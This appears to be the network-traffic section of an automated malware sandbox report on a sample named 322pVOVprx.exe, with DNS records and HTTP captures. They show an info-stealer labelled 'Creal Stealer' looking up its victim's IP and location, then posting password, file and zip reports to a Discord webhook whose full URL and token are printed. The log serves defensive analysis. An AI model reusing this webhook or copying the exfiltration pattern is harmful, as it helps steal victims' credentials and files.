                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.219109058 CET8.8.8.8192.168.2.50x8120No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.219109058 CET8.8.8.8192.168.2.50x8120No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.564898968 CET8.8.8.8192.168.2.50xd26No error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.915142059 CET8.8.8.8192.168.2.50xc4ccNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.915142059 CET8.8.8.8192.168.2.50xc4ccNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.915142059 CET8.8.8.8192.168.2.50xc4ccNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.915142059 CET8.8.8.8192.168.2.50xc4ccNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.915142059 CET8.8.8.8192.168.2.50xc4ccNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.181955099 CET8.8.8.8192.168.2.50x7821No error (0)api.gofile.io51.38.43.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.181955099 CET8.8.8.8192.168.2.50x7821No error (0)api.gofile.io51.178.66.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.181955099 CET8.8.8.8192.168.2.50x7821No error (0)api.gofile.io151.80.29.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.024468899 CET8.8.8.8192.168.2.50xd4dfNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.024468899 CET8.8.8.8192.168.2.50xd4dfNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.024468899 CET8.8.8.8192.168.2.50xd4dfNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.024468899 CET8.8.8.8192.168.2.50xd4dfNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.971434116 CET8.8.8.8192.168.2.50xd46dNo error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.324009895 CET8.8.8.8192.168.2.50x4ad6No error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.324009895 CET8.8.8.8192.168.2.50x4ad6No error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.324009895 CET8.8.8.8192.168.2.50x4ad6No error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.324009895 CET8.8.8.8192.168.2.50x4ad6No error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.324009895 CET8.8.8.8192.168.2.50x4ad6No error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.995713949 CET8.8.8.8192.168.2.50x144cNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.995713949 CET8.8.8.8192.168.2.50x144cNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.995713949 CET8.8.8.8192.168.2.50x144cNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.995713949 CET8.8.8.8192.168.2.50x144cNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.851963043 CET8.8.8.8192.168.2.50xa73dNo error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.168028116 CET8.8.8.8192.168.2.50x952cNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.168028116 CET8.8.8.8192.168.2.50x952cNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.168028116 CET8.8.8.8192.168.2.50x952cNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.168028116 CET8.8.8.8192.168.2.50x952cNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.168028116 CET8.8.8.8192.168.2.50x952cNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      • api.ipify.org
                                                                                                                                                                                                                                                      • geolocation-db.com
                                                                                                                                                                                                                                                      • canary.discord.com
                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      0192.168.2.549689104.237.62.211443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:16 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                                                                                                                      User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:16 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Content-Length: 11
                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:16 GMT
                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:16 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
                                                                                                                                                                                                                                                      Data Ascii: 84.17.52.13


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      1192.168.2.549691173.231.16.76443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:16 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                                                                                                                      User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:17 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Content-Length: 11
                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:16 GMT
                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:17 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
                                                                                                                                                                                                                                                      Data Ascii: 84.17.52.13


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      10192.168.2.549701159.89.102.253443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:24 UTC9OUTGET /jsonp/84.17.52.13 HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Host: geolocation-db.com
                                                                                                                                                                                                                                                      User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:25 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:25 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      2023-02-14 03:50:25 UTC9INData Raw: 39 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 49 54 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 49 74 61 6c 79 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 33 2e 31 34 37 39 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 31 32 2e 31 30 39 37 2c 22 49 50 76 34 22 3a 22 38 34 2e 31 37 2e 35 32 2e 31 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 99callback({"country_code":"IT","country_name":"Italy","city":null,"postal":null,"latitude":43.1479,"longitude":12.1097,"IPv4":"84.17.52.13","state":null})0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      11192.168.2.549702162.159.137.232443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:25 UTC9OUTPOST /api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKlmHAllaKTQLGGzUk77rAX2YBKF_Nt HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Length: 527
                                                                                                                                                                                                                                                      Host: canary.discord.com
                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:25 UTC10OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 69 74 3a 20 20 2d 20 60 41 4c 46 4f 4e 53 20 7c 20 38 34 2e 31 37 2e 35 32 2e 31 33 20 28 49 74 61 6c 79 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74
                                                                                                                                                                                                                                                      Data Ascii: {"content": ":flag_it: - `user | 84.17.52.13 (Italy)`", "embeds": [{"color": 0, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer", "icon_url": "htt
                                                                                                                                                                                                                                                      2023-02-14 03:50:25 UTC10INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:25 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      CF-Ray: 7992d6e7f9f63801-FRA
                                                                                                                                                                                                                                                      Set-Cookie: __dcfduid=b6c6fa40ac1a11eda3380e6de71ba7ab; Expires=Sun, 13-Feb-2028 03:50:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                      x-ratelimit-limit: 5
                                                                                                                                                                                                                                                      x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                      x-ratelimit-reset: 1676346626
                                                                                                                                                                                                                                                      x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u3ad1arqJDKHKfOEYtBOpmRWov6wKlSoMBCfXMrje8F29mJdz9U1K%2F6CctTduu8FJdKP9QaC5bRmid0aS6W%2FzXN%2Frvhmx0cZTqZV5CKplMUD63rpSZOc%2BPl3ctRoM7WJchwRjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Set-Cookie: __sdcfduid=b6c6fa40ac1a11eda3380e6de71ba7abacf54662f1128c811b771f1270f6bc115f5fb2f8b2ee18dcf83093c128cb1e70; Expires=Sun, 13-Feb-2028 03:50:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                                                                                      Set-Cookie: __cfruid=f85be939e8d594d89dab82432393e5c66f53a441-1676346625; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                      Server: cloudflare


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      2192.168.2.549693159.89.102.253443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:17 UTC0OUTGET /jsonp/84.17.52.13 HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Host: geolocation-db.com
                                                                                                                                                                                                                                                      User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:17 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:17 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      2023-02-14 03:50:17 UTC0INData Raw: 39 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 49 54 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 49 74 61 6c 79 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 33 2e 31 34 37 39 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 31 32 2e 31 30 39 37 2c 22 49 50 76 34 22 3a 22 38 34 2e 31 37 2e 35 32 2e 31 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 99callback({"country_code":"IT","country_name":"Italy","city":null,"postal":null,"latitude":43.1479,"longitude":12.1097,"IPv4":"84.17.52.13","state":null})0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      3192.168.2.549692159.89.102.253443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:17 UTC0OUTGET /jsonp/84.17.52.13 HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Host: geolocation-db.com
                                                                                                                                                                                                                                                      User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:17 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:17 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      2023-02-14 03:50:17 UTC1INData Raw: 39 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 49 54 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 49 74 61 6c 79 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 33 2e 31 34 37 39 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 31 32 2e 31 30 39 37 2c 22 49 50 76 34 22 3a 22 38 34 2e 31 37 2e 35 32 2e 31 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 99callback({"country_code":"IT","country_name":"Italy","city":null,"postal":null,"latitude":43.1479,"longitude":12.1097,"IPv4":"84.17.52.13","state":null})0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      4192.168.2.549694162.159.128.233443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:19 UTC1OUTPOST /api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKlmHAllaKTQLGGzUk77rAX2YBKF_Nt HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Length: 670
                                                                                                                                                                                                                                                      Host: canary.discord.com
                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:19 UTC1OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 69 74 3a 20 20 2d 20 60 41 4c 46 4f 4e 53 20 7c 20 38 34 2e 31 37 2e 35 32 2e 31 33 20 28 49 74 61 6c 79 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a 20 50 61 73 73 77 6f 72
                                                                                                                                                                                                                                                      Data Ascii: {"content": ":flag_it: - `user | 84.17.52.13 (Italy)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0** Passwor
                                                                                                                                                                                                                                                      2023-02-14 03:50:19 UTC3INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:19 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      CF-Ray: 7992d6c1197f920b-FRA
                                                                                                                                                                                                                                                      Set-Cookie: __dcfduid=b314816aac1a11ed8e172a194de8b40d; Expires=Sun, 13-Feb-2028 03:50:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                      x-ratelimit-limit: 5
                                                                                                                                                                                                                                                      x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                      x-ratelimit-reset: 1676346620
                                                                                                                                                                                                                                                      x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xkCuZm%2B1XauURy7r3UW0zAT5lw%2BvuQW9NX7b%2B8jV7f5rW2JJwjMpQOXgGXhc%2Bc%2BxqcpHrmZDAysQMnTySy1ZQkBR4Y2BieAidgzNOwKb%2BpBdGkDMMt84pAGbgLw343%2BbUARDQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Set-Cookie: __sdcfduid=b314816aac1a11ed8e172a194de8b40dabc6efea3fad7435a666a2977c14d0b86066e64609e131cd7c31e38c0873d8aa; Expires=Sun, 13-Feb-2028 03:50:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                                                                                      Set-Cookie: __cfruid=f2bfa2cf0bc7ca71eb942a3ce4ffa790a6fa1aa7-1676346619; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                      Server: cloudflare


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      5192.168.2.549695162.159.128.233443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:19 UTC2OUTPOST /api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKlmHAllaKTQLGGzUk77rAX2YBKF_Nt HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Length: 453
                                                                                                                                                                                                                                                      Host: canary.discord.com
                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:19 UTC2OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 69 74 3a 20 20 2d 20 60 41 4c 46 4f 4e 53 20 7c 20 38 34 2e 31 37 2e 35 32 2e 31 33 20 28 49 74 61 6c 79 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 30 35 30 34 39 32 35 39 33 31 31 34 34 35 36 31 32 34 2f 31 30 35 31 34 39 30 33 32 30 39 32 31 31 34 35 33 38
                                                                                                                                                                                                                                                      Data Ascii: {"content": ":flag_it: - `user | 84.17.52.13 (Italy)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 0, "footer": {"text": "Creal Stealer", "icon_url": "https://cdn.discordapp.com/attachments/1050492593114456124/105149032092114538
                                                                                                                                                                                                                                                      2023-02-14 03:50:19 UTC4INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:19 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      CF-Ray: 7992d6c18d269152-FRA
                                                                                                                                                                                                                                                      Set-Cookie: __dcfduid=b31e00b4ac1a11ed9b3bce217cb5ef60; Expires=Sun, 13-Feb-2028 03:50:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                      x-ratelimit-limit: 5
                                                                                                                                                                                                                                                      x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                      x-ratelimit-reset: 1676346620
                                                                                                                                                                                                                                                      x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GyENSV%2BKj4EKsyjPCyY5WHVmdk51hfk38%2B3FCKGFsAAYsqaDFk%2FuiT%2BqzJWiN7uLXd4KGUSfnjnLBJ6MREIOEz7cdkZ0plvo8m61LBxgYed1FnCyG6wr74BDGsGD9aaZwjMuyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Set-Cookie: __sdcfduid=b31e00b4ac1a11ed9b3bce217cb5ef601f88dfecdf5ddc17b7ee7b9e0172c0b5b4274f43ea0faeba7893c6913e6a46db; Expires=Sun, 13-Feb-2028 03:50:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                                                                                      Set-Cookie: __cfruid=f2bfa2cf0bc7ca71eb942a3ce4ffa790a6fa1aa7-1676346619; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                      Server: cloudflare


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      6192.168.2.54969764.185.227.155443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:21 UTC5OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                                                                                                                      User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                      Connection: close
